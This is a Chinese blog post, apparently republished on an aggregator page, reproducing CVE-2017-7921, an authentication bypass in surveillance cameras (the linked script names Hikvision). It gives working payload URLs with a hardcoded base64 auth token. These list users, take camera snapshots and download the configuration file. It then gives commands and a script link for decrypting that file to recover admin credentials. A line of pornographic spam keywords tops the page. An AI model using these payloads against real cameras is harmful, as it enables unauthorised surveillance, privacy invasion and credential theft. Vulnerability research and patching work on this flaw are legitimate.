日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

CVE-2017-7921复现(解密文件)

發布時間:2023/12/31 编程问答 30 豆豆
生活随笔 收集整理的這篇文章主要介紹了 CVE-2017-7921复现(解密文件) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

前言:CSDN管理博客內容較嚴格,有些內容會涉嫌違法違規,以往發布的被打回,這篇文章是經修改后的,故下面有些內容我會粗略寫到,大家主要看payload即可

漏洞描述

該公司多款產品中存在身份驗證漏洞。攻擊者可利用該漏洞提升權限,獲取敏感信息的訪問權限。
通過構造url進行檢索所有用戶、屏幕截圖、配置文件下載,得到二進制配置文件:configurationFile,并且可以提取登錄的賬號密碼。

Payload

IP/Security/users?auth=YWRtaW46MTEK 檢索所有用戶 IP/onvif-http/snapshot?auth=YWRtaW46MTEK 獲取鏡頭快照而不進行身份驗證 IP/System/configurationFile?auth=YWRtaW46MTEK 下載攝像頭二進制配置文件

影響版本

因涉嫌違法,經修改暫略

解密二進制文件(configurationFile)

1、腳本下載:

  • 百度網盤鏈接:https://pan.baidu.com/s/1sMV0kCeqv7mHD0BHB3qEDw
    提取碼:peak
  • 腳本原鏈接:https://github.com/chrisjd20/hikvision_CVE-2017-7921_auth_bypass_config_decryptor

2、腳本使用方法:

  • 依賴庫:pycryptodome
    依賴庫安裝:py -3 -m pip install pycryptodome
    因為我的電腦安裝了兩個版本的python,所以使用py -3
  • 解密命令:
    py -3 decrypt_configurationFile.py configurationFile
    紅框中的就是后臺登陸的賬號密碼

    由于特殊原因,就寫到這里,不進行攝像頭的登錄了,方法交給你們了,有興趣的自己去驗證吧

總結

以上是生活随笔為你收集整理的CVE-2017-7921复现(解密文件)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。